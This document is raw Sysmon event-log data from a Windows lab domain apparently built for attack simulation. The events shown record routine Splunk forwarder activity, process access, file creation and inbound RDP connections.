09:26:33.090{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-64091-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000981870Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:31.800{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59573-false10.0.1.12-8000- 23542300x8000000000000000981887Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.897{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82649666FDE6461A87A6BA15EDCB20FD,SHA256=F94904E91DD2088ED19C0757B08781F08184C845F952548E5DE3E958D54ECD79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057516Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:37.600{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B8F6D878DB9744A7313BCED20C2F7B91,SHA256=3FA4EA409AD996B29033883C73176E316C72EE4C49105A85103542696CFCCDB8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057515Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:37.225{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF90492E2AF91A420D262F56E223BB74,SHA256=E80B8AF1EAEF8270EC5832BF7748ACF4BD9A7F3F95330DD928C308FF1EE573AC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000981886Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.460{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8E4D-6151-2F7A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981885Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981884Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981883Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981882Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981881Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.460{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981880Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.444{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981879Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.444{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981878Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.444{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981877Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.444{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000981876Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.444{69CF5F33-7F27-614D-0500-00000000FD01}408424C:\Windows\system32\csrss.exe{69CF5F33-8E4D-6151-2F7A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000981875Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.444{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8E4D-6151-2F7A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000981874Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.445{69CF5F33-8E4D-6151-2F7A-00000000FD01}3240C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000981889Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:35.556{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-59935-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000981888Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:38.257{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6FD336A34DF1B85989350AEBDE8F3F1A,SHA256=EAC3CCEDA79E32DB2938D6E3E2112E819D0AFC69F7979667900902AFEA98A21C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057517Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:38.225{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BAD0529DA2F9E3AB91EFE0780DF6FA94,SHA256=8BA8026984AAACC89524626E3E711C3F264AB4C4B10DB4C6EE11537B754420FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981890Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:39.053{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3401E091BED37ECF46E1AA71B628D01D,SHA256=3B34134EDA26D59234CBA8AF0BE495A43F7CFECB1855A233BDC1536E0540C6E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057518Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:39.241{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=354B75BB8D0CE1C68E0312F5423735FF,SHA256=1B8C839165B73A2428898A9BD89B9DCABD02E0F2AF873D76E7DE9867F828581D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981891Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:40.288{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=290236FC0BF2D28201F7C2991A7703DE,SHA256=95A82BD2876FE70BC964E2ED3E0A1D4B6214021E8F0847A3978B31CF443B7731,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057519Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:40.241{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4EBB5E1C8DEEE75274D8348D4885A4FA,SHA256=06D49CF59443BCFAE44F9066679E0E7B2B27D23A508E611FB45EF2B07CE6C7CA,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000981893Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:37.800{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59574-false10.0.1.12-8000- 23542300x8000000000000000981892Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:41.522{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3257CF84FF079B51A03F368A5225AC8C,SHA256=A7C043FDAFB32BBC72BE4A02ED21DAE3397D22E00613CD782D04E7C384656C32,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057520Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:41.428{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8D54486940532AF57569F741219D47B,SHA256=3BD5B83C5D6318B9CEFD2F2BA6BBB373865140F6958CA20F66A97A5873D5602B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057522Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:42.663{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE4A0F8B44C2DEC69DA1273109694DF5,SHA256=B0DB841166A65C74E0A5AA969925DB2DDAAC38239F3913447AE48D423AE0DB9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981894Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:42.741{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09B5FBA776EF28D0B1E29C65844273B9,SHA256=995EC17B0D1F0EF649A0C8C6294144128064F2AB5030B4A60003D18DE808CA7D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057521Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:40.041{5EBD8912-8CDC-6151-6E00-00000000FD01}2608C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local54297-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001057526Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:43.892{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C69DE902C14CA8AC0659961B5C8BF13C,SHA256=E0AC0BCAA713FF618C6F570DA148E99BBF7A46B18CF0D621C26F9B3158D6730F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981895Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:43.742{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9474B334224FBB3AE49B8A68955F1ADA,SHA256=FBABC9F0D5B198AA8CE8B5B420190C3BB48BAB38D94F52A771760A07D039CD40,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001057525Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:41.630{5EBD8912-8CC0-6151-0F00-00000000FD01}300C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-63548-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001057524Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:43.006{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C889CE4AAE2380735ABD3857F6D87FBD,SHA256=0C823507F258FAA759546EA16C2D3DF274D70ACACA5C2A6718222C8CA6D581E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057523Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:43.006{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=497CE388D79C0C339CA359C670CF0041,SHA256=459CA45401EE283B958E4EBA79DAF273426D9F5DA2A8F07C4E4592A98540AD1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001057527Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:26:44.924{5EBD8912-8CE3-6151-7700-00000000FD01}704NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCBA884C84A316FAC7CF4272862765A4,SHA256=084A22965B5144FF43A2E5A623A8C10E7ABC5ECC20E4C301645D7FAFDBD434F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981896Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:44.742{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D48675DEA4E9838ECCF4B3A46C39B255,SHA256=8FDA8012A384C08C94EA9BB93B14EB3FE01BE19CAC7A458CFE67F76AD8AC94BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000981897Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:26:45.758{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F77D7E7856A593CFB87768B23B26B4A0,SHA256=95F0684EA2D32B8152C435A0673778D645D2ABD4DBB751EB1B3AA06557C78E75,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001057532Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 